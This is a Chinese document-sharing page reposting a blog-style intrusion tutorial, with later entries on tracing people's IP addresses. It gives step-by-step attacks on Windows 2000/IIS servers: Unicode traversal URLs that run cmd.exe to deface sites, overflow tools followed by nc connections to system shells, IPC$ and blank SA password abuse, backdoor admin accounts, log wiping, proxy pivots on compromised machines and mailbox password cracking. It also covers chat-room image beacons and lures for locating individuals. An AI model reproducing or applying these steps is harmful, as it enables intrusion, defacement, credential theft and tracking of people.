为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

入侵

2013-01-29 23页 doc 108KB 49阅读

用户头像

is_389777

暂无简介

举报
入侵入侵教务处 来源: 万金龙的日志 (1) UNICODE漏洞入侵 “Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。 第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICOD...
入侵
入侵教务处 来源: 万金龙的日志 (1) UNICODE漏洞入侵 “Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。 第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如: /scrīpts/..%c0%af../winnt/system32/cmd.exe 这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。 我们把/scrīpts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机 如192.168.0.111/scrīpts/..%c0%af../winnt/system32/cmd.exe 意思是192.168.0.111主机有 %c0%af 漏洞, 目标有了,我们马上打开浏览器。在网址栏里输入: 100.100.100.111/scrīpts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车 意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如: Directory of c:\ 2002-03-13 03:47p 289 default.asp 2002-02-11 03:47p 289 default.htm 2002-03-09 04:35p Documents and Settings 2002-02-11 03:47p 289 index.asp 2002-02-11 03:47p 289 index.htm 2002-05-08 05:19a Inetpub 2002-01-19 10:37p MSSQL7 2002-03-09 04:22p Program Files 2002-01-23 06:21p WINNT 4 File(s) 1,156 bytes 5 Dir(s) 2,461,421,568 bytes free ------------------------------ 的目录列。也会碰到看不到文件的空目录。 好,我们成功看到了机器里的C盘了。 我们在浏览器里输入: 192.168.0.111/scrīpts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:\Documents and Settings\All Users CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=ON ComSpec=C:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=192.168.0.111 HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90) HTTP_ACCEPT_ENCODING=gzip, deflate HTTPS=off INSTANCE_ID=1 LOCAL_ADDR=192.168.0.111 NUMBER_OF_PROCESSORS=1 Os2LibPath=C:\WINNT\system32\os2\dll; OS=Windows_NT Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN PATH_TRANSLATED=c:\inetpub\wwwroot PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Fa ----------------- 哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot 意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。 我们用命令: 192.168.0.111/scrīpts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车 我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。 我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。 我们用命令: 192.168.0.111/scrīpts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车 当看到下面的英文 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 恭喜你,你可以改他的网页了。 ---------------------------------------- 但如果你看到下面的英文就不成功,只好换其他机器了。 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access denied - C:\inetpub\wwwroot\index.asp ----------------------------- 继续。现在用ECHO改网页的内容。 100.100.100.111/scrīpts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车 当看到 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。 英文WIN2000 /scrīpts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 中文WIN2000 /scrīpts/..%c0%2f../winnt/system32/cmd.exe /scrīpts/..%c1%1c../winnt/system32/cmd.exe WIN NT4 /scrīpts/..%c1%9c../winnt/system32/cmd.exe 英文WIN2000 /scrīpts/..%c0%af../winnt/system32/cmd.exe 通用代码:/scrīpts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ (2) Windows2000输入法漏洞 先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” —“目标”—c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。 (3) idq溢出漏洞 要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。 首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。 进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813 c:\>nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [IP] 813 (?): connection refused sent 0, rcvd 0: NOTSOCK c:\> 看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。 c:\>nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [IP] 813 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> 哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。 (4)IDA溢出漏洞 所用程序:idahack 进入MS-DOS方式(假设idq.exe在c:\下) c:\idahack.exe 运行参数:c:\idahack chinese win2k : 1 chinese win2ksp1: 2 chinese win2ksp2: 3 english win2k : 4 english win2ksp1: 5 english win2ksp2: 6 japanese win2k : 7 japanese win2ksp1: 8 japanese win2ksp2: 9 korea win2k : 10 korea win2ksp1: 11 korea win2ksp2: 12 chinese nt sp5 : 13 chinese nt sp6 : 14 c:\idahack 127.0.0.1 80 1 80 connecting... sending... Now you can telnet to 80 port J好 luck 好,现在你可以telnet它的80端口了,我们用NC来连接。 C:\nc 127.0.0.1 80 Microsoft Windows 2000 [Version 5.00.2195] (C)版权所有 1985-1998 Microsoft Corp C:\WINNT\system32> OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。 (5).printer漏洞 这个漏洞,我们用两个程序来入侵。iis5hack和nc。 C:\>iis5hack iis5 remote .printer overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, :p usage: D:\IIS5HACK.EXE 用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口> chinese edition: 0 chinese edition, sp1: 1 english edition: 2 english edition, sp1: 3 japanese edition: 4 japanese edition, sp1: 5 korea edition: 6 korea edition, sp1: 7 mexico edition: 8 mexico edition, sp1: 9 c:\>iis5hack 127.0.0.19 80 1 119 iis5 remote .printer overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, :p Listn: 80 connecting... sending... Now you can telnet to 3739 port 好 luck 溢出成功! c:\>nc 127.0.0.19 119 http://www.sunx.org Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> OK,我们又成功取得system权限!玩吧。 (6)139端口入侵 我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。 用到两个NET命令,下面就是这两个命令的使用 NET VIEW? 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。? 命令格式:net view [\\computername | /domain[:domainname]]? 参数介绍:? <1>键入不带参数的net view显示当前域的计算机列表。? <2>\\computername 指定要查看其共享资源的计算机。? <3>/domain[:domainname]指定要查看其可用计算机的域? NET USE? 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。? 命令格式:net use [devicename | *] [\\computername\sharename[\volume]]? [password | *]] [/user:[domainname\]username] [[/delete] |? [/persistent:{yes | no}]]? 参数介绍:? 键入不带参数的net use列出网络连接。? devicename指定要连接到的资源名称或要断开的设备名称。? \\computername\sharename服务器及共享资源的名称。? password访问共享资源的密码。? *提示键入密码。 /user指定进行连接的另外一个用户。? domainname指定另一个域。? username指定登录的用户名。? /home将用户连接到其宿主目录? /delete取消指定网络连接。? /persistent控制永久网络连接的使用。? C:\net use \\IP C:\net view \\IP 我们已经看到对方共享了他的C,D,E三个盘 我们要做的是使用NBTSTAT命令载入NBT快取. c:\>nbtstat –R 载入NBT快取 c:\>nbtstat –c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。 (7)IPC入侵 所有程序:流光 开始:在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测” 的窗体,把那两个选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入: net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接 copy icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录 net time file://对方IP/ || 看看对方的本地时间 at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序 telnet 对方ip 端口 我们也可以改网页: net use \\ip\ipc$ "admin" /uesr:"admin" 回车。 出现“命令成功完成”。 然后输入“dir \\ip\c$\*.*” 看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面 输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了,假如你黑页在C:下,就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧? 日志清除,断开连接 : 我们copy cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file://ip/ipc$ /delete (8)超管SA空密码漏洞 使用的工具:流光IV 启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” —— SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。 net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1 net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。 下面我们来做跳板: 打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令 显示命令成功完成。 上传srv.exe: copy srv.exe \\127.0.0.1\admin$\system32 上传ntlm.exe: copy ntlm.exe \\127.0.0.1\admin$\system32 启动服务: 首先用net time \\127.0.0.1 看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00),然后我们用at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。 一分钟后在本机命令提示符中输入: telnet X.X.X.X 99 然后我们要启动NTLM.exe: 在telnet状态下直接输入ntlm回车。 显示:windows 2000 telnet dump,by assassin,all rights reserved.done! 然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)再输入net start telnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了,简单吧? (上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!) (9)如何用流光破解信箱密码 这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------选择一个字典,没有的到网上下载一个字典,或者到黑白网络去下载,我们用简单模式探测!这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。 (10)frontpage进行攻击 打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入http://127.0.0.1(http://不要漏掉)。按下“打开”按钮,一会后,出现了文件夹,成功了,现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,找个解密器破密码吧!破出来后就还可以改网页。这个只能改该网页,没什么玩的。 (11)用肉鸡做SOCK5代理跳板 需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。 首先我们在命令提示符下建立IPC$管道: net use \\127.0.0.1\ipc$ "密码" /user:帐号 通道建立好后,我们把srv.exe sss.exe ntlm.exe全部上传。 c:\copy srv.exe \\10.10.10.10\admin$ 1 files copied! c:\copy ntlm.exe \\10.10.10.10\admin$ 1 files copied! c:\copy sss.exe \\10.10.10.10\admin$ 1 files copied! 复制完毕后, 看肉鸡上现在的时间: c:\net time \\127.0.0.1 显示当前时间是 2002/4/13 晚上 09:00 我们来启动srv.exe c:\at \\127.0.0.1 09:01 srv.exe 等到09:01后。我们来连接肉鸡: c:\telnet 127.0.0.1 99 连上后显示: c:\winnt\system32> 接着我们启动NTLM.exe c:\winnt\system32>ntlm 显示: Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! C:\WINNT\system32> 首先我们终止srv.exe的telnet服务: C:\WINNT\system32>net stop telnet 继续: C:\WINNT\system32>net start telnet 再启动TELNET。 OK,我们来登陆 c:>telnet 127.0.0.1 *========================================================== Microsoft Telnet *========================================================== c:> 好了,一切顺利,我们现在正式开始做代理: c:>sss.exe -install <---------开始安装 显示: c:>sksockserver installed! 来看看配置: c:>sss -config show 显示: SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦 SkServer StartType: 3 - Manual <---服务启动方式 SkServer Enable Client Set Num:0 <---客户端的项目个数 SkServer Pass SkServer Number:0 <---经过SkServer的项目个数 来启动服务: c:>net start skserver 提示你正在启动,并且完成。 来检查一下是不是启动了: c:>net start <-----------看看启动的服务列表 These Windows 2000 services are started: Print Spooler Server Snake SockProxy Service <---------------就是它,呵呵! System Event Notification TCP/IP NetBIOS Helper Service Telephony Telnet The command completed successfully. c:>_ 好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们做代理。 安装好SocksCap后,我们在桌面上打开SocksCap V2,点开File选项选Settings...弹出卡片,在 SOCKS Server里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socks version 5,呵呵,和 Attempt local then remot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片, Profile name :程序名,随便写。 Command Line: 命令行,点后面的Browse...找到你的程序路径 Working:填好上面那个,这个就自动加上. 这样我们就把程序加到SocksCap里面了。 现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行 查看(57) 评论(1) 收藏 推荐 · 如何知道对方的IP。2 2007-03-18 18:50:17 一、查QQ用户IP地址 1.通过FolkOicq查IP FolkOicq是个能给QQ添加IP显示补丁的程序,最新版本FolkQQ0530SE_B2。下载后得到一个Zip的压缩包,用Winzip解压出文件QQ2000.EXE,将它复制到QQ的安装目录下(在这之前最好是备份一下原来的QQ2000.exe,防止以后出错不能恢复)。然后运行QQ2000,点一个在线用户,你会发现在QQ号下面有IP地址了。 2.通过IpSniper查IP IpSniper是针对QQ2000的IP地址查询工具。它支持目前OQ2000所有的版本,在Win98和Win2000操作系统下都可正常工作。当你第一次运行IpSniper程序时,会弹出一个对话框,要求你在“设置”中设置好各个参数。点击“设置”,指定QQ执行文件所在的目录以及文件名,点击“确定”即可。 下次运行IpSniper,就会直接启动QQ主程序。当你与好友或者陌生人通话的同时,IpSniper会实时的截获通话者的Ip地址、端口号以及对方的QQ号码,并把对方所在地的地理位置一并显示出来。 3.通过防火墙查IP 由于QQ使用的是UDP来传送信息的,而UDP是面向无连接的协议,QQ为了保证信息到达对方,需要对方发一个认证,告诉本机,对方已经收到消息,防火墙(例如天网)则带有UDP监听的功能,因此我们就可以利用这个认证来查看IP,哈哈,得来全不费功夫! 现在让我们举一个实际的例子来看看如何用天网查IP。 第一步:打开天网防火墙的UDP监听; 第二步:向他(她)发送一个消息; 第三步:查看自己所用的QQ服务器地址,在本例中是202.104.129.252; 第四步:排除QQ服务器地址,判断出对方的IP地址,在本例中是61.133.200.90; 怎么样,他(她)跑不掉了吧?闲太麻烦?要知道腾迅的QQ升级速度比火箭都快,用前两个办法总是有版本限制的,用这个方法可是一劳永逸啊! 4.通过NetXRay查IP NetXRay是由Cinco Networks公司开发的一个用于高级分组检错的软件,功能很强大。用一个功能如此强大的武器来查QQ的IP,有点“大才小用”了。 第一步:运行NetXRay,在菜单中选取tools→Matrix 第二步:选择选择下端出现的IP标签。 第三步:按右键,在弹出的菜单中选中Show Select Nodes 第四步:打开QQ和你想查的人聊上一句,同时观察窗口,在数据包发送的那一瞬间颜色有变化的数据线就是你和他之间的IP连线。看看数据线的另一头,那个ip地址(61.138.121.18)就是你梦寐以求的东西。 用NetXRay查QQ用户IP地址的方法还有好几种,其余的方法大家可以自己摸索试试 查QQ用户IP地址的方法和工具还有很多,这里介绍的方法已经足够你用的了,实在不行,自己找一些这方面的工具用用,很容易的。 二、聊天室中查IP 1.用IP Hunter IP Hunter是独孤剑客开发的软件。用IPHunter在聊天室查IP方法如下:在允许贴图、放音乐的聊天室,利用HTML语言向对方发送图片和音乐,如果把图片或音乐文件的路径设定到自己的IP上来,那么尽管这个URL地址上的图片或音乐文件并不存在,但你只要向对方发送过去,对方的浏览器将自动来访问你的IP。对于不同的聊天室可能会使用不同的格式,但你只需将路径设定到你的IP上就行了。实例说明如下: 如:“***聊天室”发送格式如下: 发图象:img src="http://61.159.91.29/love.jpg" 发音乐:img bgsound="http://61.159.91.29/love.mid" 在IP Hunter的“对方IP地址”栏中就会显示出他(她)的IP。 局限性:如果对方在浏览器中将图象,声音全部禁止了,此方法无能为力。对于使用代理服务器的,此方法也只能查到他所用代理的IP地址,无法查到其真实IP地址。 2.用F_ip F_ip是一个网络工具,可以查本地IP和远程IP。用F_ip查IP必须在支持WEB的聊天室才可以使用,也就是说,你可以在聊天室贴自己主页上的图片,你才能使用这个功能。 首先:运行f_ip,看到“http:”页面里有2句html语句,假设你看到的第一条是img src=http://61.159.91.23/001.gif,如果你所在的聊天室也是用这条命令贴图,那么你就可以直接使用它向你想查ip的人发这句话,1分钟之内就会在文本框中输出对方的ip,如果你所在的聊天室不支持img src=http://61.159.91.23/001.gif语句,就用所在聊天室所用的语句,但记住要把地址换成你的IP。 3.利用聊天室中的资料文件查IP 有些聊天室的服务器会把使用者的资料或对话及IP地址存为一个文件,并且大多数的服务器并没有将这个文件做加密处理,所以,我们可以通过访问这个文件从而得到用户的IP地址列表。这些文件通常是叫:online.txt 、userdata.txt 、message.txt、whoisonline.txt、或干脆就叫IP.txt。你只要在浏览器中叫出那个文件来看就可以查看一切了……由于本方法对聊天室威胁太大,因此这里就不介绍具体查找文件的方法了,在此提出的只是个思路而已。 三、查任意一个人的IP地址 1.主动查对方的IP 这种查任意一个人IP地址的基本思路是:若想知道对方的地址,只需设法让对方访问自己的IP地址就可以了,一旦对方来访问,也就建立了一个SOCKET连接,我们就可以轻松地捕获他(她)的IP地址。当然前提他得在线。 第一步:申请一个转向域名,如126.com等,并在网上做一个主页(主页无论怎么简单都可以,目的是为了查IP地址嘛); 第二步:在你想查别人IP的时候,到你申请域名的地方,将链接转到你的IP; 第三步:打开查IP地址的软件,如IP Hunter; 第四步:告诉那个你想查其IP地址的人,想办法(是用甜言蜜语还是美…计,就看你的了)让他去你的网站看看,给他这个转向域名; 第五步:当他输入此网址以后,域名会自动指向你的IP,因此你就能知道他的IP了; 第六步:当你查到他的IP地址后,再将转向的地址改为你网站的地址,达到隐藏的目的。 2.被动查对方IP 如今的网上真的不大安静,总有些人拿着扫描器扫来扫去。如果你想查那个扫你电脑的人的IP,可用下面的方法。 一种做法是用天网,用软件默认的规则即可。如果有人扫描你的电脑,那么在“日志”中就可以看到那个扫你的人的IP了,他扫描你电脑的哪个端口也可从中看出。由于我们在前面已经讲了用天网查QQ用户IP的方法,因此在这里就不多说了。 另外一种做法是用黑客陷阱软件,如“小猪快跑”、“猎鹿人”等,这些软件可以欺骗对方你的某些端口已经打开,让他误以为你已经中了木马,当他与你的电脑产生连接时,他的IP就记录在这些软件中了。以“小猪快跑”为例,在该软件中有个非常不错的功能:“自定义密码欺骗端口设置”,你可以用它来自定义开启10个端口用来监听,不大明白?OK,下面就以把自己的计算机伪装成中了冰河木马为例,看看可爱的小猪是怎样欺骗对方、如何查到扫描者的IP的吧! 点击“端口设置”选“自定义木马欺骗端口设置”,进入“木马欺骗端口设置”对话框。 在“木马欺骗端口设置”界面上用鼠标选中“端口1”,“端口数”填冰河木马的默认端口7626,其他不用填,点击“设置完毕”退出。好了,冰河木马欺骗端口设置完毕。 现在回到“小猪快跑”的主界面,点击“开始监视”,工作区内立即出现“7626端口开始监视”的提示,欺骗开始了…… 这时,如果有“灰”客对你的计算机进行扫描,他就会发现你计算机的7626端口开着,这个“灰”客自然会以为你中了木马冰河呢。当他用冰河控制端登陆你的计算机时,冰河会告诉他“命令发送完毕”,由于你没有中木马,所谓的木马是你设置出来的假木马,因此他也就无法再进行下一步了。无论他登陆多少次,都只会看到“命令发送完毕”,而“小猪快跑”的主窗口中却清清楚楚地显示出“***.***.***.***试图连接你的7626端口,已经开始欺骗”。其中“***.***.***.***”就是对方的IP地址了,知道了对方的IP地址后,你就可以爱怎么办就怎么办了。 四、查互联网中已知域名主机的IP 1.用Windows自带的网络小工具Ping.exe 如你想www.sina.com.cn的IP地址,只要在DOS窗口下键入命令“ping www.sina.com.cn”,就可以看到IP了。 2.用工具查 这里我们以网络刺客II为例来说说。 网络刺客II是是天行出品的专门为安全人士的中文网络安全检测软件,运行网络刺客II,进入主界面,选择“工具箱”菜单下的“IP<->主机名”,出现一个对话框,在“输入IP或域名”下面的框中写入对方的域名(我们这里假设对方的域名www.sina.com.cn),点击“转换成IP”按钮,对方的IP就出来了,是202.106.184.200。 查看(29) 评论(0) 收藏 推荐 · 如何知道对方的IP 2007-03-18 18:48:12 1、邮件查询法F!T! 使用这种方法查询对方计算机的IP地址时,首先要求对方先给你发一封电子邮件,然后你可以通过查看该邮件属性的方法,来获得邮件发送者所在计算机的IP地址;下面就是该方法的具体实施步骤: 首先运行OutLook express程序,并单击工具栏中的“接受全部邮件”按钮,将朋友发送的邮件接受下来,再打开收件箱页面,找到朋友发送过来的邮件,并用鼠标右键单击之,从弹出的右键菜单中,执行“选项”命令;qLQLU" 在其后打开的属性设置窗口中,找到“internet标题”,你将看到“Received: from xiecaiwen (unknown [11.111.45.25])”这样的信息,其中的“11.111.45.25”就是对方好友的IP地址;当然,要是对方好友通过Internet中的WEB信箱给你发送电子邮件的话,那么你在这里看到的IP地址其实并不是他所在工作站的真实IP地址,而是WEB信箱所在网站的IP地址。@ 当然,如果你使用的是其他邮件客户端程序的话,查看发件人IP地址的方法可能与上面不一样;例如要是你使用foxmail来接受好友邮件的话,那么你可以在收件箱中,选中目标邮件,再单击菜单栏中的“邮件”选项,从弹出的下拉菜单中选中“原始信息”命令,就能在其后的界面中看到对方好友的IP地址了。_ 2、日志查询法Bs/LQ 这种方法是通过防火墙来对QQ聊天记录进行实时监控,然后打开防火墙的日志记录,找到对方好友的IP地址。为方便叙述,本文就以KV2004防火墙为例,来向大家介绍一下如何搜查对方好友的IP地址: 考虑到与好友进行QQ聊天是通过UDP协议进行的,因此你首先要设置好KV防火墙,让其自动监控UDP端口,一旦发现有数据从UDP端口进入的话,就将它自动记录下来。在设置KV2004防火墙时,先单击防火墙界面中的“规则设置”按钮,然后单击“新建规则”按钮,弹出设置窗口; 在该窗口的“名称”文本框中输入“搜查IP地址”,在“说明”文本框中也输入“搜查IP地址”;再在“网络条件”设置项处,选中“接受数据包”复选框,同时将“对方IP地址”设置为“任何地址”,而在“本地IP地址”设置项处不需要进行任何设置; 下面再单击“UDP”标签,并在该标签页面下的“本地端口”设置项处,选中“端口范围”选项,然后在起始框中输入“0”,在结束框中输入“65535”;同样地,在“对方端口”设置项处,也选中“端口范围”选项,然后在起始框中输入“0”,在结束框中输入“65535”。 接着在“当所有条件满足时”设置项处,选中“通行”选项,同时将“其他处理”处的“记录”选项选中,而“规则对象”设置项不需要进行任何设置;完成了上面的所有设置后,单击“确定”按钮,返回到防火墙的主界面;再在主界面中选中刚刚创建好的“搜查IP地址”规则,同时单击“保存”按钮,将前面的设置保存下来。 完成好上面的设置后,KV防火墙将自动对QQ聊天记录进行全程监控,一旦对方好友给你发来QQ信息时,那么对方好友的IP地址信息就会自动出现在防火墙的日志文件中,此时你可以进入到KV防火墙的安装目录中,找到并打开“kvfwlog”文件,就能搜查到对方好友的IP地址。 3、工具查询法 这种方法是通过专业的IP地址查询工具,来快速搜查到对方计算机的IP地址。例如,借助一款名为WhereIsIP的搜查工具,你可以轻松根据对方好友的Web网站地址,搜查得到对方好友的IP地址,甚至还能搜查到对方好友所在的物理位置。在用WhereIsIP程序搜查对方IP地址时,首先启动该程序打开搜查界面,然后单击该界面的“Web site”按钮,在其后的窗口中输入对方好友的Web地址,再单击“next”按钮,这样该程序就能自动与Internet中的Domain Name Whois数据库联系,然后从该数据库中搜查到与该Web网站地址对应的IP地址了。当然,除了可以知道IP地址外,你还能知道对方好友所在的具体物理位置。 查看(11) 评论(0) 收藏 推荐 · 什么时IP扫描器 2007-03-18 18:33:51 什么是IP扫描器 IP扫描器实际上就是指能自动检测远程和本地主机安全性弱点的程序。在Internet安全领域,扫描器是最出名的破解工具,在Internet上,你可以碰到一些非常流行的扫描器(比如Satan和Strobe)。利用这些扫描器,你可以不留痕迹的发现远在美国一台服务器的安全性弱点。 真正的扫描器是TCP端口扫描器,这种程序可以选择TCP/IP端口和服务(比哪,一个匿名用户是否可以登录等),而其它一些扫描器仅仅是UNIX网络应用程序,这些程序一般用于观察某一服务是否正在一台远程机器上正常运行,他们不是真正的扫描器,但也可以用于收集目标主机的信息(UNIX平台上通用的是Rusers和Host命令就是这类程序很好的例子)。 系统要求取决于扫描器、操作系统以及与Internet的连接。某些扫描器是专为UNIX编写的,所以需要UNIX系统。运行扫描器最低限度的要求是,你必须有一个兼容的操作系统、一个调制解调器(或其它网络连接)、以及一些耐心,当配置越先进,连接方式越快,运行扫描器的效果也就越好,过低的配置可能引起堆栈溢出和保护错误,或者机器挂起。另外,并不是所有扫描器都能在不同平台上同样地工作,在某些平台上,可能某个选项被禁止;而在其它平台上,这个选项是必须的,没有它程序可能无法工作。 扫描器的合法性是一个相当敏感问题。安全工作人员和开发人员经常设计、编写、公布扫描器。这些工具通常在公共范围内公布,以便系统管理员能够检查自己系统的弱点。然而,尽管拥有和使用扫描器不合法,但如果你不是一个系统的管理员,却使用扫描器检查目标主机,企图得到Passwd文件,你就已经触犯了法律。 